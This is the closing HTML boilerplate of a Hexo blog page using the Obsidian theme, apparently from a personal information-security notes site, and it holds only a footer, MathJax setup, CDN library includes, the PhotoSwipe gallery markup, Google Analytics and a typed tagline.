            <a href="https://github.com/TriDiamond/hexo-theme-obsidian" title="Obsidian" target="_blank" rel="noopener">Obsidian</a>
        </span>
        <small><a href="https://github.com/TriDiamond/hexo-theme-obsidian/blob/master/CHANGELOG.md" title="v1.4.3" target="_blank" rel="noopener">v1.4.3</a></small>
    </p>
</footer>

<script type="text/javascript" src="https://cdn.bootcss.com/mathjax/2.7.6/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<script>
  MathJax.Hub.Config({
    "HTML-CSS": {
      preferredFont: "TeX",
      availableFonts: ["STIX", "TeX"],
      linebreaks: {
        automatic: true
      },
      EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
      inlineMath: [
        ["$", "$"],
        ["\\(", "\\)"]
      ],
      processEscapes: true,
      ignoreClass: "tex2jax_ignore|dno",
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
      noUndefined: {
        attributes: {
          mathcolor: "red",
          mathbackground: "#FFEEEE",
          mathsize: "90%"
        }
      },
      Macros: {
        href: "{}"
      }
    },
    messageStyle: "none"
  });
</script>
<script>
  function initialMathJax() {
    MathJax.Hub.Queue(function () {
      var all = MathJax.Hub.getAllJax(),
        i;
      // console.log(all);
      for (i = 0; i < all.length; i += 1) {
        console.log(all[i].SourceElement().parentNode)
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  }

  function reprocessMathJax() {
    if (typeof MathJax !== 'undefined') {
      MathJax.Hub.Queue(["Typeset", MathJax.Hub]);
    }
  }
</script>



    <link rel="stylesheet" href="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.css">
    <script src="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.js"></script>

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="/knlvre.github.io/js/plugin.js"></script>
<script src="/knlvre.github.io/js/obsidian.js"></script>
<script src="/knlvre.github.io/js/jquery.truncate.js"></script>
<script src="/knlvre.github.io/js/search.js"></script>
<script src="//cdn.bootcss.com/typed.js/2.0.10/typed.min.js"></script>
<script src="//cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>

<script src="https://cdn.bootcss.com/codemirror/5.48.4/codemirror.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/javascript/javascript.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/css/css.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/xml/xml.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/htmlmixed/htmlmixed.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/clike/clike.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/php/php.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/shell/shell.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/python/python.min.js"></script>



    <script src="/knlvre.github.io/js/busuanzi.min.js"></script>
    <script>
        $(document).ready(function () {
            if ($('span[id^="busuanzi_"]').length) {
                initialBusuanzi();
            }
        });
    </script>


<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/default-skin/default-skin.min.css">
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>



    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="//www.googletagmanager.com/gtag/js?id=UA-149874671-1"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'UA-149874671-1');
    </script>





<script>
    function initialTyped () {
        var typedTextEl = $('.typed-text');
        if (typedTextEl && typedTextEl.length > 0) {
            var typed = new Typed('.typed-text', {
                strings: ["Notes During Information Security Learning.", "信息安全学习过程中的笔记。"],
                typeSpeed: 90,
                loop: true,
                loopCount: Infinity,
                backSpeed: 20,
            });
        }
    }

    if ($('.article-header') && $('.article-header').length) {
        $(document).ready(function () {
            initialTyped();
        });
    }
</script>




</html>
